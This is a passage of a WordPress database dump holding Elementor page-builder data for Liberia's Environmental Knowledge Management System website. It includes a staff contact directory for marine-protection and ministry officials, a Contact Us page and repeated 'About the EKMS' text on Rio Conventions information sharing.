e_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine A\'jami<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f07c86\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5891ccb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/domah.png\",\"id\":3659}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>Administrative Assistant, Office of the Minister<br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel G. Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:emmanuelgballah_@gmail.com\\\">emmanuelgballah_@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11222,1834,'_elementor_controls_usage','a:0:{}'),(11223,1834,'_elementor_edit_mode','builder'),(11224,1834,'_elementor_template_type','wp-page'),(11225,1834,'_elementor_version','2.7.5'),(11226,1834,'_wp_page_template','default'),(11227,1834,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11228,1835,'_elementor_edit_mode','builder'),(11229,1835,'_elementor_template_type','wp-page'),(11230,1835,'_elementor_version','2.7.5'),(11231,1835,'_wp_page_template','default'),(11232,1835,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11234,1836,'_elementor_edit_mode','builder'),(11235,1836,'_elementor_template_type','wp-page'),(11236,1836,'_elementor_version','2.7.5'),(11237,1836,'_wp_page_template','default'),(11238,1836,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11241,1837,'_elementor_edit_mode','builder'),(11242,1837,'_elementor_template_type','wp-page'),(11243,1837,'_elementor_version','2.7.5'),(11244,1837,'_wp_page_template','default'),(11245,1837,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"7766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11248,1838,'_elementor_edit_mode','builder'),(11249,1838,'_elementor_template_type','wp-page'),(11250,1838,'_elementor_version','2.7.5'),(11251,1838,'_wp_page_template','default'),(11252,1838,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11260,1840,'_elementor_edit_mode','builder'),(11261,1840,'_elementor_template_type','wp-page'),(11262,1840,'_elementor_version','2.7.5'),(11263,1840,'_wp_page_template','default'),(11264,1840,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of the Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Liberia Environmental Knowledge Management System (EKMS) provides access to important data from key government institutions in Liberia on implementation of the Rio Conventions. The  information in the EKMS is provided for informational purposes only. This website contents can not be taken to reflect the views of its sponsors.\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11266,1841,'_elementor_edit_mode','builder'),(11267,1841,'_elementor_template_type','wp-page'),(11268,1841,'_elementor_version','2.7.5'),(11269,1841,'_wp_page_template','default'),(11270,1841,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"